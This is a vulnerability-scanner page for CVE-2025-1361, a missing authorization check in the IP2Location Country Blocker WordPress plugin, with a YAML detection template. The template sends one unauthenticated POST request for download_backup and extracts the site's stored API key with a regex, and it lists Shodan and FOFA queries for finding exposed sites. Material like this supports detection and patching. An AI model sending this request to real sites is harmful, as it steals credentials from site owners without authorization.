IP2Location Country Blocker < 2.38.9 - Unauthenticated Information Disclosure
CVE-2025-1361
Verified
Description
IP2Location Country Blocker plugin for WordPress up to version 2.38.8 contains a regular information exposure caused by missing capability checks on admin_init(), letting unauthenticated attackers view plugin settings, exploit requires no special conditions.
Severity
High
CVSS Score
7.5
Exploit Probability
1%
Published Date
April 22, 2026
Template Author
pussycat0x
CVE-2025-1361.yaml
id: CVE-2025-1361
info:
name: IP2Location Country Blocker < 2.38.9 - Unauthenticated Information Disclosure
author: pussycat0x
severity: high
description: |
IP2Location Country Blocker plugin for WordPress up to version 2.38.8 contains a regular information exposure caused by missing capability checks on admin_init(), letting unauthenticated attackers view plugin settings, exploit requires no special conditions.
impact: |
Unauthenticated attackers can view plugin settings, potentially leading to information disclosure or further attacks.
remediation: |
Update to the latest version of the plugin that fixes the capability check issue.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/b63bc2b6-1abc-4cfa-a7e5-3995640f66a7
- https://wpscan.com/vulnerability/3629be51-7c7e-4677-917f-a0693df3980f/
- https://wordpress.org/plugins/ip2location-country-blocker/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2025-1361
cwe-id: CWE-862
epss-score: 0.01278
epss-percentile: 0.66451
cpe: cpe:2.3:a:ip2location:country_blocker:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/ip2location-country-blocker/"
fofa-query: body="/wp-content/plugins/ip2location-country-blocker/"
shodan-query: http.html:"/wp-content/plugins/ip2location-country-blocker/"
tags: cve,cve2025,wordpress,wp-plugin,wp-scan,ip2location-country-blocker,unauth
http:
- raw:
- |
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=download_backup
matchers:
- type: dsl
dsl:
- 'contains_all(body, "ip2location_country_blocker_api_key")'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
condition: and
extractors:
- type: regex
name: api_key
part: body
group: 1
regex:
- '"ip2location_country_blocker_api_key":"([^"]*)"'
# digest: 4a0a004730450220252d0e09c8592d3bdf24185ad6cd1afd4220a17a435d2e41901276569d50a6a80221009d60eeebf833a908c4a6229745e0eaf871f763e5e124a652ede8b3b51d0062a8:922c64590222798bb761d5b6d8e729507.5Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2025-1361
CWE ID:
cwe-862
Remediation Steps
Update to the latest version of the plugin that fixes the capability check issue.